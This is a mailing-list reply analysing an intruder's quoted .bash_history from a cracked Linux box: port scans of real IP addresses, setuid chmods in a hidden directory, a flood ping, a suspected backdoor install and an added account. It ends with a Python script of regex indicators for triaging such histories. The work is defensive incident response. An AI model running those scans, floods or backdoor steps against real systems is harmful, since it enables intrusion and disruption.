Dzuy M. Nguyen wrote:
> Can someone help me figure out this "/.bash_history" from my
> computer that someone cracked into and did some damage.
>
> I'll probably re-install the box, but I'd like to see what they did
> before I destroy it. I've attached the "/.bash_history".

Let's cut it down some..

> cc anatomy.c -o anatomy
> cc kod.c -o kofd
> cp kofd kod
> rm kofd

According to google, kod and kofd are related to the oracle database. It's
possible this is a coincidence, or he was using these names to try to appear
innocuous (weird choices though; 'sh' is better..). It's odd he made them and
immediately deleted them -- unless he was logged in twice and went and used
them in between.

> ./anatomy 216.209.196.154 22
> ./anatomy 216.209.205.68 22
> ./anatomy 216.209.207.150 22

I'd guess anatomy is some kind of port scanner. 22 is the ssh port.

> tar -zxvf bnc2_6_4_tar.gz
> cd bnc2.6.4
> ./configure
> make
> make install

bnc2 is an IRC proxy server. Home page is http://bnc.dragondata.com/, and a
file by the same name as the one he untarred is at http://bnc.dragondata.com/

> cd small
> mkdir .shit
> cd .shit
> chmod 777 *
> chmod +s *
> chmod 666 *
> chmod 777 *

I'd assume he is ftping or scping or something files onto your box, since
files seem to have just appeared here. Probably ftp, since the permissions had
to be fixed up. Might be useful to see if anything shows up in the logs for
daemons that can transfer files.

> ./pscan
> ./b
> ./pscan 167.64 111

Presumably a port scanner that operates on whole networks. Port 111 is the Sun
RPC port, so he's probably interested in nfs exploits or related things here.

> ./pscan 195.54 111
> cat wuftp.log
> ./b 195.54.3.134
> ./b 195.54.29.7
> ./b 195.54.221.21

It looks like 'b' is his mode of attack after he portscans and finds new
victims.

> ping -f newsforlinux.com

A little malicious flood pinging always brightens up the day..

> ftp columbia.digiweb.com
> tar -zxvf linux.tar.gz
> cd .bd
> ./install

Hm. Since columbia.digiweb.com has no open ftp server, or kernel mirror that I
can see, I doubt this is really the kernel.

> cat /etc/passwd
> pico /ec/passwd
> cat .bash_history
> passwd z
> cat /etc/passwd

Adds a user; be sure to delete that user immediately...

Of course, you probably want to back up the system and reinstall from scratch.

-- 
see shy jo
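The walk through the history above was done by hand. As an added example (not code from the original message or from its author), the script below applies the same kind of triage mechanically: it tags each history line with an indicator (compiler runs, hidden directories, setuid bits, a local binary aimed at an address and a port, flood pings, edits to the password file) and pulls out the remote hosts the attacker aimed tools at, so the owners of those hosts can be warned. The rule labels, the helper names and the regexes are this script's own; the sample history is a constructed excerpt modelled on the quoted lines, not the full file.

```python
"""Triage a shell history from a compromised box for post-intrusion indicators.
Added example; rule labels, helper names and the sample history are this
script's own, not the original message's."""
import re
from collections import Counter

# Constructed sample: an excerpt modelled on the .bash_history quoted above.
SAMPLE_HISTORY = """\
cc anatomy.c -o anatomy
cc kod.c -o kofd
./anatomy 216.209.196.154 22
./anatomy 216.209.205.68 22
tar -zxvf bnc2_6_4_tar.gz
cd bnc2.6.4
./configure
make
make install
mkdir .shit
cd .shit
chmod 777 *
chmod +s *
./pscan 167.64 111
./b 195.54.3.134
ping -f newsforlinux.com
ftp columbia.digiweb.com
tar -zxvf linux.tar.gz
cd .bd
./install
pico /ec/passwd
passwd z
cat /etc/passwd
"""

# Indicator rules as (label, regex); one line may match several rules.
RULES = [
    ("compile",        re.compile(r"^(cc|gcc|make)(\s|$)")),
    ("unpack",         re.compile(r"^tar\s+\S*x")),
    ("file_transfer",  re.compile(r"^(ftp|ncftp|scp|sftp|wget|lynx)\s")),
    ("hidden_dir",     re.compile(r"^(mkdir|cd)\s+\.[^./\s]")),
    # chmod +s / u+s style, or a 4-digit mode whose first digit carries setuid/setgid
    ("setuid",         re.compile(r"^chmod\s+(\S*[+=]\S*s\S*|[2-7][0-7]{3})\s")),
    # a local binary given an address or prefix plus a port: a scan
    ("scan",           re.compile(r"^\./\S+\s+\d{1,3}(\.\d{1,3}){1,3}\s+\d{1,5}$")),
    # a local binary given a single host and no port: the follow-up tool
    ("attack",         re.compile(r"^\./\S+\s+\d{1,3}(\.\d{1,3}){3}$")),
    ("flood_ping",     re.compile(r"^ping\b.*\s-\S*f\b")),
    ("account_change", re.compile(
        r"^((pico|vi|vim|nano|emacs)\s+\S*passwd$|passwd(\s+\S+)?$|useradd\b|adduser\b)")),
    ("recon",          re.compile(r"^cat\s+(/etc/(passwd|shadow)|\S*\.bash_history)$")),
    ("local_install",  re.compile(r"^\./install$")),
]


def triage(history):
    """Return (line_no, label, command) for every rule each non-empty line matches."""
    hits = []
    for n, raw in enumerate(history.splitlines(), 1):
        cmd = raw.strip()
        if not cmd:
            continue
        hits.extend((n, label, cmd) for label, rx in RULES if rx.search(cmd))
    return hits


def label_counts(hits):
    """How many history lines fired each indicator label."""
    return Counter(label for _, label, _ in hits)


def remote_targets(history):
    """Hosts the attacker aimed tools at from this box, sorted, so their owners
    can be notified: IPv4 addresses or prefixes passed to ./tools, plus the
    non-option argument of ftp/ncftp/ping."""
    targets = set()
    for raw in history.splitlines():
        parts = raw.split()
        if not parts:
            continue
        if parts[0].startswith("./"):
            targets.update(p for p in parts[1:]
                           if re.fullmatch(r"\d{1,3}(\.\d{1,3}){1,3}", p))
        elif parts[0] in ("ftp", "ncftp", "ping"):
            args = [p for p in parts[1:] if not p.startswith("-")]
            if args:
                targets.add(args[-1])
    return sorted(targets)


if __name__ == "__main__":
    hits = triage(SAMPLE_HISTORY)
    for n, label, cmd in hits:
        print(f"{n:3d}  {label:<15} {cmd}")
    print("\nby indicator:", dict(label_counts(hits)))
    print("remote targets to notify:", remote_targets(SAMPLE_HISTORY))
```

Run it against the real file with `triage(open("/.bash_history").read())`. The rules are deliberately loose: a `chmod 777 *` is not flagged as setuid, but a typo'd `pico /ec/passwd` still shows up as a password-file edit, because what matters on a box like this is seeing the intent, not exact paths. Treat the output as a reading aid for the history, not as proof of what ran; a history can be edited or truncated by the intruder.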